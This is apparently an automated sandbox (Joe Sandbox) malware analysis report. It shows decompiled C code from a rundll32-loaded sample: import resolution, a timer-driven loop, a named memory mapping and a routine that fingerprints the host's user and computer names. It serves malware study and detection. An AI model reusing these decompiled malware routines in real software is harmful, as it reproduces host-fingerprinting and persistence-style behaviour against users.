                                                    • Part of subcall function 04B3163F: SysAllocString.OLEAUT32(?), ref: 04B31680
                                                    • Part of subcall function 04B39039: HeapFree.KERNEL32(00000000,00000000,04B37F18,00000000,?,?,00000000), ref: 04B39045
                                                  • HeapFree.KERNEL32(00000000,?,?), ref: 04B38E3D
                                                  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 04B38E49
                                                  • HeapFree.KERNEL32(00000000,?,?,06AF95B0), ref: 04B38E55
                                                  • HeapFree.KERNEL32(00000000,?), ref: 04B38E61
                                                  • HeapFree.KERNEL32(00000000,?), ref: 04B38E6D
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.332233488.0000000004B31000.00000020.00020000.sdmp, Offset: 04B30000, based on PE: true
                                                  • Associated: 0000000A.00000002.332220331.0000000004B30000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000000A.00000002.332265347.0000000004B3C000.00000002.00020000.sdmp Download File
                                                  • Associated: 0000000A.00000002.332273904.0000000004B3D000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000000A.00000002.332292678.0000000004B3F000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_4b30000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: Heap$Free$lstrlen$lstrcatwsprintf$lstrcpy$CountCriticalSectionTickTrim$AllocAllocateEnterLeaveStringmbstowcsmemsetstrcpywcstombs
                                                  • String ID:
                                                  • API String ID: 3748877296-0
                                                  • Opcode ID: 09e704dd1337a9f9657a25771b7a775fa3bdb6c20f2f6f99cb817ec42d0c241f
                                                  • Instruction ID: 17136a180c8c414cb3f662f9d9db3052897f43f6569197b50f03ba440e0e711b
                                                  • Opcode Fuzzy Hash: 09e704dd1337a9f9657a25771b7a775fa3bdb6c20f2f6f99cb817ec42d0c241f
                                                  • Instruction Fuzzy Hash: 93915A71900218AFDF11EFAADC84A9E7BB9EF08316F144496F808E7260D739ED51DB61
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 04B3ADE5, Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 209libraryCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 97 4b3ade5-4b3ae4a 98 4b3ae6b-4b3ae95 97->98 99 4b3ae4c-4b3ae66 RaiseException 97->99 101 4b3ae97 98->101 102 4b3ae9a-4b3aea6 98->102 100 4b3b01b-4b3b01f 99->100 101->102 103 4b3aeb9-4b3aebb 102->103 104 4b3aea8-4b3aeb3 102->104 105 4b3af63-4b3af6d 103->105 106 4b3aec1-4b3aec8 103->106 104->103 112 4b3affe-4b3b005 104->112 108 4b3af79-4b3af7b 105->108 109 4b3af6f-4b3af77 105->109 110 4b3aeca-4b3aed6 106->110 111 4b3aed8-4b3aee5 LoadLibraryA 106->111 113 4b3aff9-4b3affc 108->113 114 4b3af7d-4b3af80 108->114 109->108 110->111 116 4b3af28-4b3af34 InterlockedExchange 110->116 115 4b3aee7-4b3aef7 GetLastError 111->115 111->116 118 4b3b007-4b3b014 112->118 119 4b3b019 112->119 113->112 121 4b3af82-4b3af85 114->121 122 4b3afae-4b3afbc GetProcAddress 114->122 123 4b3af07-4b3af23 RaiseException 115->123 124 4b3aef9-4b3af05 115->124 125 4b3af36-4b3af3a 116->125 126 4b3af5c-4b3af5d FreeLibrary 116->126 118->119 119->100 121->122 127 4b3af87-4b3af92 121->127 122->113 128 4b3afbe-4b3afce GetLastError 122->128 123->100 124->116 124->123 125->105 129 4b3af3c-4b3af48 LocalAlloc 125->129 126->105 127->122 131 4b3af94-4b3af9a 127->131 133 4b3afd0-4b3afd8 128->133 134 4b3afda-4b3afdc 128->134 129->105 130 4b3af4a-4b3af5a 129->130 130->105 131->122 136 4b3af9c-4b3af9f 131->136 133->134 134->113 135 4b3afde-4b3aff6 RaiseException 134->135 135->113 136->122 138 4b3afa1-4b3afac 136->138 138->113 138->122
                                                  C-Code - Quality: 51%
                                                  			E04B3ADE5(long _a4, long _a8) {
				signed int _v8;
				intOrPtr _v16;
				LONG* _v28;
				long _v40;
				long _v44;
				long _v48;
				CHAR* _v52;
				long _v56;
				CHAR* _v60;
				long _v64;
				signed int* _v68;
				char _v72;
				signed int _t76;
				signed int _t80;
				signed int _t81;
				intOrPtr* _t82;
				intOrPtr* _t83;
				intOrPtr* _t85;
				intOrPtr* _t90;
				intOrPtr* _t95;
				intOrPtr* _t98;
				struct HINSTANCE__* _t99;
				void* _t102;
				intOrPtr* _t104;
				void* _t115;
				long _t116;
				void _t125;
				void* _t131;
				signed short _t133;
				struct HINSTANCE__* _t138;
				signed int* _t139;

				_t139 = _a4;
				_v28 = _t139[2] + 0x4b30000;
				_t115 = _t139[3] + 0x4b30000;
				_t131 = _t139[4] + 0x4b30000;
				_v8 = _t139[7];
				_v60 = _t139[1] + 0x4b30000;
				_v16 = _t139[5] + 0x4b30000;
				_v64 = _a8;
				_v72 = 0x24;
				_v68 = _t139;
				_v56 = 0;
				asm("stosd");
				_v48 = 0;
				_v44 = 0;
				_v40 = 0;
				if(( *_t139 & 0x00000001) == 0) {
					_a8 =  &_v72;
					RaiseException(0xc06d0057, 0, 1,  &_a8);
					return 0;
				}
				_t138 =  *_v28;
				_t76 = _a8 - _t115 >> 2 << 2;
				_t133 =  *(_t131 + _t76);
				_a4 = _t76;
				_t80 =  !(_t133 >> 0x1f) & 0x00000001;
				_v56 = _t80;
				_t81 = _t133 + 0x4b30002;
				if(_t80 == 0) {
					_t81 = _t133 & 0x0000ffff;
				}
				_v52 = _t81;
				_t82 =  *0x4b3d1a0; // 0x0
				_t116 = 0;
				if(_t82 == 0) {
					L6:
					if(_t138 != 0) {
						L18:
						_t83 =  *0x4b3d1a0; // 0x0
						_v48 = _t138;
						if(_t83 != 0) {
							_t116 =  *_t83(2,  &_v72);
						}
						if(_t116 != 0) {
							L32:
							 *_a8 = _t116;
							L33:
							_t85 =  *0x4b3d1a0; // 0x0
							if(_t85 != 0) {
								_v40 = _v40 & 0x00000000;
								_v48 = _t138;
								_v44 = _t116;
								 *_t85(5,  &_v72);
							}
							return _t116;
						} else {
							if(_t139[5] == _t116 || _t139[7] == _t116) {
								L27:
								_t116 = GetProcAddress(_t138, _v52);
								if(_t116 == 0) {
									_v40 = GetLastError();
									_t90 =  *0x4b3d19c; // 0x0
									if(_t90 != 0) {
										_t116 =  *_t90(4,  &_v72);
									}
									if(_t116 == 0) {
										_a4 =  &_v72;
										RaiseException(0xc06d007f, _t116, 1,  &_a4);
										_t116 = _v44;
									}
								}
								goto L32;
							} else {
								_t95 =  *((intOrPtr*)(_t138 + 0x3c)) + _t138;
								if( *_t95 == 0x4550 &&  *((intOrPtr*)(_t95 + 8)) == _v8 && _t138 ==  *((intOrPtr*)(_t95 + 0x34))) {
									_t116 =  *(_a4 + _v16);
									if(_t116 != 0) {
										goto L32;
									}
								}
								goto L27;
							}
						}
					}
					_t98 =  *0x4b3d1a0; // 0x0
					if(_t98 == 0) {
						L9:
						_t99 = LoadLibraryA(_v60); // executed
						_t138 = _t99;
						if(_t138 != 0) {
							L13:
							if(InterlockedExchange(_v28, _t138) == _t138) {
								FreeLibrary(_t138);
							} else {
								if(_t139[6] != 0) {
									_t102 = LocalAlloc(0x40, 8);
									if(_t102 != 0) {
										 *(_t102 + 4) = _t139;
										_t125 =  *0x4b3d198; // 0x0
										 *_t102 = _t125;
										 *0x4b3d198 = _t102;
									}
								}
							}
							goto L18;
						}
						_v40 = GetLastError();
						_t104 =  *0x4b3d19c; // 0x0
						if(_t104 == 0) {
							L12:
							_a8 =  &_v72;
							RaiseException(0xc06d007e, 0, 1,  &_a8);
							return _v44;
						}
						_t138 =  *_t104(3,  &_v72);
						if(_t138 != 0) {
							goto L13;
						}
						goto L12;
					}
					_t138 =  *_t98(1,  &_v72);
					if(_t138 != 0) {
						goto L13;
					}
					goto L9;
				}
				_t116 =  *_t82(0,  &_v72);
				if(_t116 != 0) {
					goto L33;
				}
				goto L6;
			}


































                                                  0x04b3adf4
                                                  0x04b3ae0a
                                                  0x04b3ae10
                                                  0x04b3ae12
                                                  0x04b3ae17
                                                  0x04b3ae1d
                                                  0x04b3ae22
                                                  0x04b3ae25
                                                  0x04b3ae33
                                                  0x04b3ae3a
                                                  0x04b3ae3d
                                                  0x04b3ae40
                                                  0x04b3ae41
                                                  0x04b3ae44
                                                  0x04b3ae47
                                                  0x04b3ae4a
                                                  0x04b3ae4f
                                                  0x04b3ae5e
                                                  0x00000000
                                                  0x04b3ae64
                                                  0x04b3ae6e
                                                  0x04b3ae78
                                                  0x04b3ae7d
                                                  0x04b3ae7f
                                                  0x04b3ae89
                                                  0x04b3ae8c
                                                  0x04b3ae8f
                                                  0x04b3ae95
                                                  0x04b3ae97
                                                  0x04b3ae97
                                                  0x04b3ae9a
                                                  0x04b3ae9d
                                                  0x04b3aea2
                                                  0x04b3aea6
                                                  0x04b3aeb9
                                                  0x04b3aebb
                                                  0x04b3af63
                                                  0x04b3af63
                                                  0x04b3af6a
                                                  0x04b3af6d
                                                  0x04b3af77
                                                  0x04b3af77
                                                  0x04b3af7b
                                                  0x04b3aff9
                                                  0x04b3affc
                                                  0x04b3affe
                                                  0x04b3affe
                                                  0x04b3b005
                                                  0x04b3b007
                                                  0x04b3b011
                                                  0x04b3b014
                                                  0x04b3b017
                                                  0x04b3b017
                                                  0x00000000
                                                  0x04b3af7d
                                                  0x04b3af80
                                                  0x04b3afae
                                                  0x04b3afb8
                                                  0x04b3afbc
                                                  0x04b3afc4
                                                  0x04b3afc7
                                                  0x04b3afce
                                                  0x04b3afd8
                                                  0x04b3afd8
                                                  0x04b3afdc
                                                  0x04b3afe1
                                                  0x04b3aff0
                                                  0x04b3aff6
                                                  0x04b3aff6
                                                  0x04b3afdc
                                                  0x00000000
                                                  0x04b3af87
                                                  0x04b3af8a
                                                  0x04b3af92
                                                  0x04b3afa7
                                                  0x04b3afac
                                                  0x00000000
                                                  0x00000000
                                                  0x04b3afac
                                                  0x00000000
                                                  0x04b3af92
                                                  0x04b3af80
                                                  0x04b3af7b
                                                  0x04b3aec1
                                                  0x04b3aec8
                                                  0x04b3aed8
                                                  0x04b3aedb
                                                  0x04b3aee1
                                                  0x04b3aee5
                                                  0x04b3af28
                                                  0x04b3af34
                                                  0x04b3af5d
                                                  0x04b3af36
                                                  0x04b3af3a
                                                  0x04b3af40
                                                  0x04b3af48
                                                  0x04b3af4a
                                                  0x04b3af4d
                                                  0x04b3af53
                                                  0x04b3af55
                                                  0x04b3af55
                                                  0x04b3af48
                                                  0x04b3af3a
                                                  0x00000000
                                                  0x04b3af34
                                                  0x04b3aeed
                                                  0x04b3aef0
                                                  0x04b3aef7
                                                  0x04b3af07
                                                  0x04b3af0a
                                                  0x04b3af1a
                                                  0x00000000
                                                  0x04b3af20
                                                  0x04b3af01
                                                  0x04b3af05
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x04b3af05
                                                  0x04b3aed2
                                                  0x04b3aed6
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x04b3aed6
                                                  0x04b3aeaf
                                                  0x04b3aeb3
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000

                                                  APIs
                                                  • RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 04B3AE5E
                                                  • LoadLibraryA.KERNELBASE(?), ref: 04B3AEDB
                                                  • GetLastError.KERNEL32 ref: 04B3AEE7
                                                  • RaiseException.KERNEL32(C06D007E,00000000,00000001,?), ref: 04B3AF1A
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.332233488.0000000004B31000.00000020.00020000.sdmp, Offset: 04B30000, based on PE: true
                                                  • Associated: 0000000A.00000002.332220331.0000000004B30000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000000A.00000002.332265347.0000000004B3C000.00000002.00020000.sdmp Download File
                                                  • Associated: 0000000A.00000002.332273904.0000000004B3D000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000000A.00000002.332292678.0000000004B3F000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_4b30000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: ExceptionRaise$ErrorLastLibraryLoad
                                                  • String ID: $
                                                  • API String ID: 948315288-3993045852
                                                  • Opcode ID: e6d5e71f569919f81d030789620792d2a8a7330c31febc313749e592c23cbba4
                                                  • Instruction ID: 2b79f4c3f4b08d177e9ec836c5b8d8f1ab92cd78f3d39083564131e947b6363c
                                                  • Opcode Fuzzy Hash: e6d5e71f569919f81d030789620792d2a8a7330c31febc313749e592c23cbba4
                                                  • Instruction Fuzzy Hash: D4813CB5A00605AFDB10CFAAD884BADB7F5EF4C312F20816AF545E7240E774E945CB60
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 04B36786, Relevance: 16.6, APIs: 11, Instructions: 150timememoryCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 139 4b36786-4b367b2 memset CreateWaitableTimerA 140 4b36913-4b36919 GetLastError 139->140 141 4b367b8-4b36808 _allmul SetWaitableTimer WaitForMultipleObjects 139->141 142 4b3691c-4b36923 140->142 143 4b36883-4b36888 141->143 144 4b3680a-4b3680d 141->144 145 4b36889-4b3688d 143->145 146 4b36818 144->146 147 4b3680f call 4b373fd 144->147 148 4b3688f-4b36897 HeapFree 145->148 149 4b3689d-4b368a1 145->149 151 4b36822 146->151 152 4b36814-4b36816 147->152 148->149 149->145 153 4b368a3-4b368ac CloseHandle 149->153 154 4b36825-4b36829 151->154 152->146 152->151 153->142 155 4b3683b-4b3685a call 4b38504 154->155 156 4b3682b-4b36832 154->156 159 4b3685f-4b36864 155->159 156->155 157 4b36834 156->157 157->155 160 4b36866-4b3686f 159->160 161 4b368ae-4b368b3 159->161 160->154 162 4b36871-4b36880 call 4b33bf1 160->162 163 4b368d2-4b368da 161->163 164 4b368b5-4b368bb 161->164 162->143 165 4b368e0-4b36908 _allmul SetWaitableTimer WaitForMultipleObjects 163->165 164->143 167 4b368bd-4b368d0 call 4b3a1b0 164->167 165->154 168 4b3690e 165->168 167->165 168->143
                                                  C-Code - Quality: 83%
                                                  			E04B36786(intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				struct %anon52 _v8;
				long _v12;
				char _v16;
				char _v20;
				signed int _v24;
				intOrPtr _v32;
				union _LARGE_INTEGER _v36;
				intOrPtr _v40;
				void* _v44;
				void _v88;
				char _v92;
				struct %anon52 _t46;
				intOrPtr _t51;
				long _t53;
				void* _t54;
				struct %anon52 _t60;
				long _t64;
				signed int _t65;
				void* _t68;
				void* _t70;
				signed int _t71;
				intOrPtr _t73;
				intOrPtr _t76;
				void** _t78;
				void* _t80;

				_t73 = __edx;
				_v92 = 0;
				memset( &_v88, 0, 0x2c);
				_t46 = CreateWaitableTimerA(0, 1, 0);
				_v44 = _t46;
				if(_t46 == 0) {
					_v8.LowPart = GetLastError();
				} else {
					_push(0xffffffff);
					_push(0xff676980);
					_push(0);
					_push( *0x4b3d240);
					_v20 = 0;
					_v16 = 0;
					L04B3B0C8();
					_v36.LowPart = _t46;
					_v32 = _t73;
					SetWaitableTimer(_v44,  &_v36, 0, 0, 0, 0);
					_t51 =  *0x4b3d26c; // 0x31c
					_v40 = _t51;
					_t53 = WaitForMultipleObjects(2,  &_v44, 0, 0xffffffff);
					_v8.LowPart = _t53;
					if(_t53 == 0) {
						if(_a8 != 0) {
							L4:
							 *0x4b3d24c = 5;
						} else {
							_t68 = E04B373FD(_t73); // executed
							if(_t68 != 0) {
								goto L4;
							}
						}
						_v12 = 0;
						L6:
						L6:
						if(_v12 == 1 && ( *0x4b3d260 & 0x00000001) == 0) {
							_v12 = 2;
						}
						_t71 = _v12;
						_t58 = _t71 << 4;
						_t76 = _t80 + (_t71 << 4) - 0x54;
						_t72 = _t71 + 1;
						_v24 = _t71 + 1;
						_t60 = E04B38504(_t72, _t72, _t80 + _t58 - 0x58, _t76,  &_v20,  &_v16); // executed
						_v8.LowPart = _t60;
						if(_t60 != 0) {
							goto L17;
						}
						_t65 = _v24;
						_t90 = _t65 - 3;
						_v12 = _t65;
						if(_t65 != 3) {
							goto L6;
						} else {
							_v8.LowPart = E04B33BF1(_t72, _t90,  &_v92, _a4, _a8);
						}
						goto L12;
						L17:
						__eflags = _t60 - 0x10d2;
						if(_t60 != 0x10d2) {
							_push(0xffffffff);
							_push(0xff676980);
							_push(0);
							_push( *0x4b3d244);
							goto L21;
						} else {
							__eflags =  *0x4b3d248; // 0x0
							if(__eflags == 0) {
								goto L12;
							} else {
								_t60 = E04B3A1B0();
								_push(0xffffffff);
								_push(0xdc3cba00);
								_push(0);
								_push( *0x4b3d248);
								L21:
								L04B3B0C8();
								_v36.LowPart = _t60;
								_v32 = _t76;
								SetWaitableTimer(_v44,  &_v36, 0, 0, 0, 0);
								_t64 = WaitForMultipleObjects(2,  &_v44, 0, 0xffffffff);
								__eflags = _t64;
								_v8.LowPart = _t64;
								if(_t64 == 0) {
									goto L6;
								} else {
									goto L12;
								}
							}
						}
						L25:
					}
					L12:
					_t78 =  &_v92;
					_t70 = 3;
					do {
						_t54 =  *_t78;
						if(_t54 != 0) {
							HeapFree( *0x4b3d238, 0, _t54);
						}
						_t78 =  &(_t78[4]);
						_t70 = _t70 - 1;
					} while (_t70 != 0);
					CloseHandle(_v44);
				}
				return _v8;
				goto L25;
			}




























                                                  0x04b36786
                                                  0x04b36798
                                                  0x04b3679b
                                                  0x04b367a7
                                                  0x04b367af
                                                  0x04b367b2
                                                  0x04b36919
                                                  0x04b367b8
                                                  0x04b367b8
                                                  0x04b367ba
                                                  0x04b367bf
                                                  0x04b367c0
                                                  0x04b367c6
                                                  0x04b367c9
                                                  0x04b367cc
                                                  0x04b367da
                                                  0x04b367e5
                                                  0x04b367e8
                                                  0x04b367ea
                                                  0x04b367f7
                                                  0x04b36801
                                                  0x04b36805
                                                  0x04b36808
                                                  0x04b3680d
                                                  0x04b36818
                                                  0x04b36818
                                                  0x04b3680f
                                                  0x04b3680f
                                                  0x04b36816
                                                  0x00000000
                                                  0x00000000
                                                  0x04b36816
                                                  0x04b36822
                                                  0x00000000
                                                  0x04b36825
                                                  0x04b36829
                                                  0x04b36834
                                                  0x04b36834
                                                  0x04b3683b
                                                  0x04b36844
                                                  0x04b3684b
                                                  0x04b36854
                                                  0x04b36857
                                                  0x04b3685a
                                                  0x04b36861
                                                  0x04b36864
                                                  0x00000000
                                                  0x00000000
                                                  0x04b36866
                                                  0x04b36869
                                                  0x04b3686c
                                                  0x04b3686f
                                                  0x00000000
                                                  0x04b36871
                                                  0x04b36880
                                                  0x04b36880
                                                  0x00000000
                                                  0x04b368ae
                                                  0x04b368ae
                                                  0x04b368b3
                                                  0x04b368d2
                                                  0x04b368d4
                                                  0x04b368d9
                                                  0x04b368da
                                                  0x00000000
                                                  0x04b368b5
                                                  0x04b368b5
                                                  0x04b368bb
                                                  0x00000000
                                                  0x04b368bd
                                                  0x04b368bd
                                                  0x04b368c2
                                                  0x04b368c4
                                                  0x04b368c9
                                                  0x04b368ca
                                                  0x04b368e0
                                                  0x04b368e0
                                                  0x04b368e8
                                                  0x04b368f3
                                                  0x04b368f6
                                                  0x04b36901
                                                  0x04b36903
                                                  0x04b36905
                                                  0x04b36908
                                                  0x00000000
                                                  0x04b3690e
                                                  0x00000000
                                                  0x04b3690e
                                                  0x04b36908
                                                  0x04b368bb
                                                  0x00000000
                                                  0x04b368b3
                                                  0x04b36883
                                                  0x04b36885
                                                  0x04b36888
                                                  0x04b36889
                                                  0x04b36889
                                                  0x04b3688d
                                                  0x04b36897
                                                  0x04b36897
                                                  0x04b3689d
                                                  0x04b368a0
                                                  0x04b368a0
                                                  0x04b368a6
                                                  0x04b368a6
                                                  0x04b36923
                                                  0x00000000

                                                  APIs
                                                  • memset.NTDLL ref: 04B3679B
                                                  • CreateWaitableTimerA.KERNEL32(00000000,00000001,00000000), ref: 04B367A7
                                                  • _allmul.NTDLL(00000000,FF676980,000000FF), ref: 04B367CC
                                                  • SetWaitableTimer.KERNELBASE(?,?,00000000,00000000,00000000,00000000), ref: 04B367E8
                                                  • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 04B36801
                                                  • HeapFree.KERNEL32(00000000,00000000), ref: 04B36897
                                                  • CloseHandle.KERNEL32(?), ref: 04B368A6
                                                  • _allmul.NTDLL(00000000,FF676980,000000FF,00000002), ref: 04B368E0
                                                  • SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,FF676980,000000FF,00000002,?,?,04B32417,?), ref: 04B368F6
                                                  • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 04B36901
                                                    • Part of subcall function 04B373FD: StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,06AF9388,00000000,?,7519F710,00000000,7519F730), ref: 04B3744C
                                                    • Part of subcall function 04B373FD: HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,06AF93C0,?,00000000,30314549,00000014,004F0053,06AF937C), ref: 04B374E9
                                                    • Part of subcall function 04B373FD: HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,04B36814), ref: 04B374FB
                                                  • GetLastError.KERNEL32 ref: 04B36913
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.332233488.0000000004B31000.00000020.00020000.sdmp, Offset: 04B30000, based on PE: true
                                                  • Associated: 0000000A.00000002.332220331.0000000004B30000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000000A.00000002.332265347.0000000004B3C000.00000002.00020000.sdmp Download File
                                                  • Associated: 0000000A.00000002.332273904.0000000004B3D000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000000A.00000002.332292678.0000000004B3F000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_4b30000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: FreeHeapTimerWaitable$MultipleObjectsWait_allmul$CloseCreateErrorHandleLastmemset
                                                  • String ID:
                                                  • API String ID: 3521023985-0
                                                  • Opcode ID: 957a67e91ec007503bae969b80a6c8baec681b796f4ba461309c56b535e6c263
                                                  • Instruction ID: c08aff40b5192a0335fff27f52ed3dd164fdcefbc3c2d32a8be5a1d6a46c6256
                                                  • Opcode Fuzzy Hash: 957a67e91ec007503bae969b80a6c8baec681b796f4ba461309c56b535e6c263
                                                  • Instruction Fuzzy Hash: 6E511C71805229BADF20DFD6DC449EEBFB8EF49326F204256F815B6190D774AA44CBA0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 04B31B2F, Relevance: 13.6, APIs: 9, Instructions: 72filetimeCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  C-Code - Quality: 74%
                                                  			E04B31B2F(intOrPtr __edx, void** _a4, void** _a8) {
				intOrPtr _v8;
				struct _FILETIME* _v12;
				short _v56;
				struct _FILETIME* _t12;
				intOrPtr _t13;
				void* _t17;
				void* _t21;
				intOrPtr _t27;
				long _t28;
				void* _t30;

				_t27 = __edx;
				_t12 =  &_v12;
				GetSystemTimeAsFileTime(_t12);
				_push(0x192);
				_push(0x54d38000);
				_push(_v8);
				_push(_v12);
				L04B3B0C2();
				_push(_t12);
				_v12 = _t12;
				_t13 =  *0x4b3d27c; // 0x1fba5a8
				_t5 = _t13 + 0x4b3e862; // 0x6af8e0a
				_t6 = _t13 + 0x4b3e59c; // 0x530025
				_push(0x16);
				_push( &_v56);
				_v8 = _t27;
				L04B3AD5A();
				_t17 = CreateFileMappingW(0xffffffff, 0x4b3d2a8, 4, 0, 0x1000,  &_v56); // executed
				_t30 = _t17;
				if(_t30 == 0) {
					_t28 = GetLastError();
				} else {
					if(GetLastError() == 0xb7) {
						_t21 = MapViewOfFile(_t30, 6, 0, 0, 0); // executed
						if(_t21 == 0) {
							_t28 = GetLastError();
							if(_t28 != 0) {
								goto L6;
							}
						} else {
							 *_a4 = _t30;
							 *_a8 = _t21;
							_t28 = 0;
						}
					} else {
						_t28 = 2;
						L6:
						CloseHandle(_t30);
					}
				}
				return _t28;
			}













                                                  0x04b31b2f
                                                  0x04b31b37
                                                  0x04b31b3b
                                                  0x04b31b41
                                                  0x04b31b46
                                                  0x04b31b4b
                                                  0x04b31b4e
                                                  0x04b31b51
                                                  0x04b31b56
                                                  0x04b31b57
                                                  0x04b31b5a
                                                  0x04b31b5f
                                                  0x04b31b66
                                                  0x04b31b70
                                                  0x04b31b72
                                                  0x04b31b73
                                                  0x04b31b76
                                                  0x04b31b92
                                                  0x04b31b98
                                                  0x04b31b9c
                                                  0x04b31bea
                                                  0x04b31b9e
                                                  0x04b31bab
                                                  0x04b31bbb
                                                  0x04b31bc3
                                                  0x04b31bd5
                                                  0x04b31bd9
                                                  0x00000000
                                                  0x00000000
                                                  0x04b31bc5
                                                  0x04b31bc8
                                                  0x04b31bcd
                                                  0x04b31bcf
                                                  0x04b31bcf
                                                  0x04b31bad
                                                  0x04b31baf
                                                  0x04b31bdb
                                                  0x04b31bdc
                                                  0x04b31bdc
                                                  0x04b31bab
                                                  0x04b31bf1

                                                  APIs
                                                  • GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,04B322EA,?,?,4D283A53,?,?), ref: 04B31B3B
                                                  • _aulldiv.NTDLL(?,?,54D38000,00000192), ref: 04B31B51
                                                  • _snwprintf.NTDLL ref: 04B31B76
                                                  • CreateFileMappingW.KERNELBASE(000000FF,04B3D2A8,00000004,00000000,00001000,?), ref: 04B31B92
                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,04B322EA,?,?,4D283A53), ref: 04B31BA4
                                                  • MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000), ref: 04B31BBB
                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,04B322EA,?,?), ref: 04B31BDC
                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,04B322EA,?,?,4D283A53), ref: 04B31BE4
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.332233488.0000000004B31000.00000020.00020000.sdmp, Offset: 04B30000, based on PE: true
                                                  • Associated: 0000000A.00000002.332220331.0000000004B30000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000000A.00000002.332265347.0000000004B3C000.00000002.00020000.sdmp Download File
                                                  • Associated: 0000000A.00000002.332273904.0000000004B3D000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000000A.00000002.332292678.0000000004B3F000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_4b30000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: File$ErrorLastTime$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
                                                  • String ID:
                                                  • API String ID: 1814172918-0
                                                  • Opcode ID: 671ba7ae6397dd3957156cc0308e4cf6bb9f7d8f3abd208c54723654c1aa46f3
                                                  • Instruction ID: eae932dd041cad96732dfeee0afdb1cf8dfa9bf4db873cde84290abc213ad2fc
                                                  • Opcode Fuzzy Hash: 671ba7ae6397dd3957156cc0308e4cf6bb9f7d8f3abd208c54723654c1aa46f3
                                                  • Instruction Fuzzy Hash: 5121D576600208BBD721DFAADC05F8E7BBDEB48752F1541A2F605E7190FB74E9048B60
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 04B3269C, Relevance: 12.1, APIs: 8, Instructions: 102memoryCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 181 4b3269c-4b326b0 182 4b326b2-4b326b7 181->182 183 4b326ba-4b326cc call 4b36b43 181->183 182->183 186 4b32720-4b3272d 183->186 187 4b326ce-4b326de GetUserNameW 183->187 188 4b3272f-4b32746 GetComputerNameW 186->188 187->188 189 4b326e0-4b326f0 RtlAllocateHeap 187->189 191 4b32784-4b327a6 188->191 192 4b32748-4b32759 RtlAllocateHeap 188->192 189->188 190 4b326f2-4b326ff GetUserNameW 189->190 193 4b32701-4b3270d call 4b32496 190->193 194 4b3270f-4b3271e HeapFree 190->194 192->191 195 4b3275b-4b32764 GetComputerNameW 192->195 193->194 194->188 197 4b32766-4b32772 call 4b32496 195->197 198 4b32775-4b3277e HeapFree 195->198 197->198 198->191
                                                  C-Code - Quality: 96%
                                                  			E04B3269C(char __eax, signed int* __esi) {
				long _v8;
				char _v12;
				signed int _v16;
				signed int _v20;
				signed int _v28;
				long _t34;
				signed int _t39;
				long _t50;
				char _t59;
				intOrPtr _t61;
				void* _t62;
				void* _t63;
				signed int* _t64;
				char _t65;
				intOrPtr* _t67;
				void* _t68;
				signed int* _t69;

				_t69 = __esi;
				_t65 = __eax;
				_v8 = 0;
				_v12 = __eax;
				if(__eax == 0) {
					_t59 =  *0x4b3d270; // 0xd448b889
					_v12 = _t59;
				}
				_t64 = _t69;
				E04B36B43( &_v12, _t64);
				if(_t65 != 0) {
					 *_t69 =  *_t69 ^  *0x4b3d278 ^ 0x4c0ca0ae;
				} else {
					GetUserNameW(0,  &_v8); // executed
					_t50 = _v8;
					if(_t50 != 0) {
						_t62 = RtlAllocateHeap( *0x4b3d238, 0, _t50 + _t50);
						if(_t62 != 0) {
							if(GetUserNameW(_t62,  &_v8) != 0) {
								_t63 = _t62;
								 *_t69 =  *_t69 ^ E04B32496(_v8 + _v8, _t63);
							}
							HeapFree( *0x4b3d238, 0, _t62);
						}
					}
				}
